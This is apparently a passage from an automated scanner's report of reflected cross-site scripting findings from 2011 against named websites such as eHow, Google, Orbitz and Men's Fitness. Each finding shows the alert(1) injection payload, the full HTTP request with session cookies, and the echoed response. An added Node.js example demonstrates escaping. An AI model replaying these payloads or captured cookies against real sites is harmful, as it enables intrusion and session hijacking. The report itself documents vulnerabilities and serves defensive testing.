X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 75294
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Vacations & Travel Planning - How To Information ...[SNIP]... <fb:like href="http://www.ehow.com/vacations-and-travel-planning/?2b79c'-alert(1)-'5e746d16608=1" ref="like" width="300"> ...[SNIP]...
1.448. http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ehow.com
Path: /video_6598099_make-sugar-spice-scrub.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df61'-alert(1)-'9bca15399b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6598099_make-sugar-spice-scrub.html?3df61'-alert(1)-'9bca15399b4=1 HTTP/1.1
Host: www.ehow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:14:51 GMT
Server: Microsoft-IIS/6.0
ETag:
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 83575
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Sugar & Spice Scrub: Gorgeously Gre ...[SNIP]... 6682/flash/36cbefe4-4d7a-49a0-b6a2-b38d82d69318.flv', cp: '', pid: '', demand_playlistid: '', from_url: 'http%3a%2f%2fwww.ehow.com%2fvideo_6598099_make-sugar-spice-scrub.html%3f3df61'-alert(1)-'9bca15399b4%3d1' },vars||{});
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.449. http://www.ehow.com/video_6976779_sensational-snacks.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/video_6976779_sensational-snacks.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50c27'-alert(1)-'7bea5207a21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_6976779_sensational-snacks.html?50c27'-alert(1)-'7bea5207a21=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:48 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74883
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.450. http://www.ehow.com/video_7199214_onion-flatbread-recipe.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/video_7199214_onion-flatbread-recipe.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abe44'-alert(1)-'7efe9cc39a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video_7199214_onion-flatbread-recipe.html?abe44'-alert(1)-'7efe9cc39a0=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:50 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 85016
var videoSWFObject = new SWFObject('/flash/player.swf', "VideoPlayer", options.width, options.height, "9", "CCCCCC"); videoSWFObject.addParam("allowScriptAccess", " ...[SNIP]...
1.451. http://www.ehow.com/weddings-and-parties/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/weddings-and-parties/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de308'-alert(1)-'4a8b2e9f3c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:15 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71835
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weddings & Parties - How To Information | eHow.co ...[SNIP]... <fb:like href="http://www.ehow.com/weddings-and-parties/?de308'-alert(1)-'4a8b2e9f3c2=1" ref="like" width="300"> ...[SNIP]...
1.452. http://www.ehow.com/weight-management-and-body-image/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/weight-management-and-body-image/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2da39'-alert(1)-'64118fe1441 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71939
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Weight Management & Body Image - How To Informati ...[SNIP]... <fb:like href="http://www.ehow.com/weight-management-and-body-image/?2da39'-alert(1)-'64118fe1441=1" ref="like" width="300"> ...[SNIP]...
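The five eHow findings above (1.448 to 1.452) all land the parameter name inside a single-quoted JavaScript string literal, which is why the report flags script context as the hardest place to echo user data safely. The following is an added example, not code from the report or from eHow: it reproduces that context in Node.js with hypothetical templates (renderVulnerable, renderNaive, renderHardened and runScript are assumed names) and a stand-in alert so the breakout can be checked offline. It also shows the trap behind the remediation advice: a quote-only backslash escape stops the report's probe but is defeated by a leading backslash, while \xHH escaping of every non-alphanumeric character holds for both.

```javascript
// Added example (not part of the Burp report or of the eHow site's code).
// Reproduces the context in findings 1.448-1.452: attacker-controlled input
// lands inside a single-quoted JavaScript string literal in a server-rendered
// page, and the '-alert(1)-' probe closes the literal and runs code.

// Constructed inputs modelled on the report's payload and on the classic
// bypass for a quote-only escape.
const PROBE = "3df61'-alert(1)-'9bca15399b4";
const BYPASS = "\\'-alert(1)//";

// Hypothetical vulnerable template: the value is dropped straight into the
// literal, as the from_url: '...' echo in the report shows.
function renderVulnerable(value) {
  return "var from_url = '" + value + "';";
}

// Hypothetical "fix" that only backslash-escapes the quote character. It stops
// PROBE, but BYPASS supplies its own backslash: \\' becomes a literal
// backslash followed by a quote that closes the string.
function renderNaive(value) {
  return "var from_url = '" + String(value).replace(/'/g, "\\'") + "';";
}

// Proper escaping for a JS string context: every character outside
// [A-Za-z0-9] becomes \xHH (or \uHHHH), so the input can never close the
// literal, introduce a backslash, or contain </script>.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}

function renderHardened(value) {
  return "var from_url = '" + encodeForJsString(value) + "';";
}

// Stand-in for the browser: run the rendered script with an `alert` that
// records its calls instead of opening a dialog. Returns the value the script
// assigned and the list of alert() argument lists.
function runScript(script) {
  const calls = [];
  const alert = (...args) => calls.push(args);
  const value = new Function("alert", script + "\nreturn from_url;")(alert);
  return { value, calls };
}

// Print a matrix of template x input -> number of alert() calls and whether
// the value the script ends up with is the attacker's input, unexecuted.
for (const [label, render] of [
  ["vulnerable", renderVulnerable],
  ["naive", renderNaive],
  ["hardened", renderHardened],
]) {
  for (const input of [PROBE, BYPASS]) {
    const { value, calls } = runScript(render(input));
    console.log(label.padEnd(10), JSON.stringify(input).padEnd(34),
      "alert calls:", calls.length, "value preserved:", value === input);
  }
}
```

Run it with node; the vulnerable row executes the report's probe, the naive row survives the probe but executes the backslash variant, and the hardened row executes neither while still delivering the exact input string to the script. The same \xHH encoding is what a server-side template engine's JavaScript-string escaper should produce; HTML entity encoding alone is the wrong tool here because entities are not decoded inside a script block.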
The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 25665<script>alert(1)</script>0604eb18ad9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html25665<script>alert(1)</script>0604eb18ad9?blockID=399825&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Date: Wed, 02 Feb 2011 15:47:06 GMT Content-Length: 859 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html25665<script>alert(1)</script>0604eb18ad9?blockID=399825&feedID=3698"</strong> ...[SNIP]...
The value of the blockID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd8b"><script>alert(1)</script>1ccb1a2cd18 was submitted in the blockID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825dbd8b"><script>alert(1)</script>1ccb1a2cd18&feedID=3698 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 15:46:32 GMT Date: Wed, 02 Feb 2011 15:46:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 47432
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
...[SNIP]... <input type=hidden name="blockID" id = "blockID" value="399825dbd8b"><script>alert(1)</script>1ccb1a2cd18"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35edc"><script>alert(1)</script>0b5c5c8ae8 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /msn/01/28/11/No-limits-for-Robles-as-next-stage-becko/landing.html?blockID=399825&feedID=369835edc"><script>alert(1)</script>0b5c5c8ae8 HTTP/1.1 Host: www.foxsportsarizona.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Pragma: no-cache Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Wed, 02 Feb 2011 15:46:46 GMT Date: Wed, 02 Feb 2011 15:46:46 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"> <html lang="en">
The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 20c64(a)bb11cc7cdf6 was submitted in the hl parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en20c64(a)bb11cc7cdf6&prmd=ivnscm HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
1.457. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.google.com
Path:
/advanced_search
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15b95(a)f122f347a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscm&15b95(a)f122f347a32=1 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:53 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a68a8(a)2fc3268e051 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+boston&hl=en&prmd=ivnscma68a8(a)2fc3268e051 HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:50 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b05a6(a)914fa9d20b7 was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /advanced_search?q=millenium+bostonb05a6(a)914fa9d20b7&hl=en&prmd=ivnscm HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:51:49 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 417bd(a)c494a2ec40e was submitted in the q parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images?q=millenium+boston417bd(a)c494a2ec40e&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1 Host: www.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=173272373.1294766927.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272373.1871872.1294766927.1294766927.1294766927.1; TZ=360; SSDATA-DOMAIN=ikjREw(0:; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 15:53:22 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Connection: close
The value of the 79b73' request parameter is copied into the HTML document as plain text between tags. The payload 43785<script>alert(1)</script>8587ea4b601 was submitted in the 79b73' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?79b73'43785<script>alert(1)</script>8587ea4b601 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <title>Invision Power Services :: 404 File Not Found</ti ...[SNIP]... <br /> /index.php?79b73'43785<script>alert(1)</script>8587ea4b601 </div> ...[SNIP]...
1.462. http://www.invisionpower.com/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.invisionpower.com
Path:
/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 24714<script>alert(1)</script>6e8c7271658 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.php?24714<script>alert(1)</script>6e8c7271658=1 HTTP/1.1 Host: www.invisionpower.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa was submitted in the REST URL parameter 1. This input was echoed as 9f9d9"><img src=a onerror=alert(1)>35c645f95fa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Tshirt_Workout9f9d9"><img%20src%3da%20onerror%3dalert(1)>35c645f95fa/fitness/ab_exercises/136?cid=RSS HTTP/1.1 Host: www.mensfitness.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 14:33:45 GMT Server: Apache/2.2.3 (Red Hat) Age: 1 Cache-Control: max-age=43199 Via: HTTP/1.1 cdn.mensfitness.com (MII-WSD/1.4) X-Pb-Mii: Powered by Mirror Image Internet Expires: Wed, 02 Feb 2011 02:33:43 GMT Content-Type: text/html; charset=UTF-8 Via: 1.1 mdw107103 (MII-APC/1.6) Connection: close Content-Length: 45083
<html> <head>
<title>The T-Shirt Body Workout - Men's Fitness</title>
<meta name="Description" content="Fill out your favorite tee with our exclusive eight-week program for bigger shoulders, chest, ...[SNIP]... <a href="/Tshirt_Workout9f9d9"><img src=a onerror=alert(1)>35c645f95fa/fitness/ab_exercises/136?page=2"> ...[SNIP]...
The value of the deal_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a was submitted in the deal_id parameter. This input was echoed as 954c0"style="x:expression(alert(1))"4d82bd8d62a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /App/GDDC?deal_id=aeromexico-winter-fares\954c0"style%3d"x%3aexpression(alert(1))"4d82bd8d62a HTTP/1.1 Host: www.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: DataPersistence="||||||Same as pick-up||||||0|0|false|||||||||||false||false|false|||||||||||||||||||||6|New+York%2C+NY|Orlando%2C+FL|02/11/11|||||||||mm/dd/yy|02/17/11||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy|||||||||mm/dd/yy||||||||vacation_tab|"; JSESSIONID=D1DA21DD44B66783CD13169E22B74D3D; NSC_ufbmfbg.tel.80_dt_ufbmfbg=ffffffff09e3d5ba45525d5f4f58455e445a4a4217b9; BetaGroup="01/27/2011 19:45:19|A|A|N|C|N|H|B|P|N"; OSC=265DA875C314B0C54855FC80AB1B1D8C; myFavoriteHotels=favoriteHotels%3A%7CpastSearches%3A%7BHOTEL_Boston%2C+MA%2C+United+States_1_2011-02-01T00%3A00%3A00.000-06%3A00_2011-02-02T00%3A00%3A00.000-06%3A00____35371_2_1_1_1%7D; logging=265DA875C314B0C54855FC80AB1B1D8C|egapp30p|egapp2217p.prod.orbitz.net; myTests=UBP323_SinglePage%3A%7C%3A%7C%3A%7CMERCH500_hotelResultCards%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7C%3A%7Cv1; NSC_JO25vb2abn443z5cugskakbawwvvqet=ffffffff09e3a72d45525d5f4f58455e445a4a4217b9; mbox=check#true#1296573951|session#1296573790873-999455#1296575751; 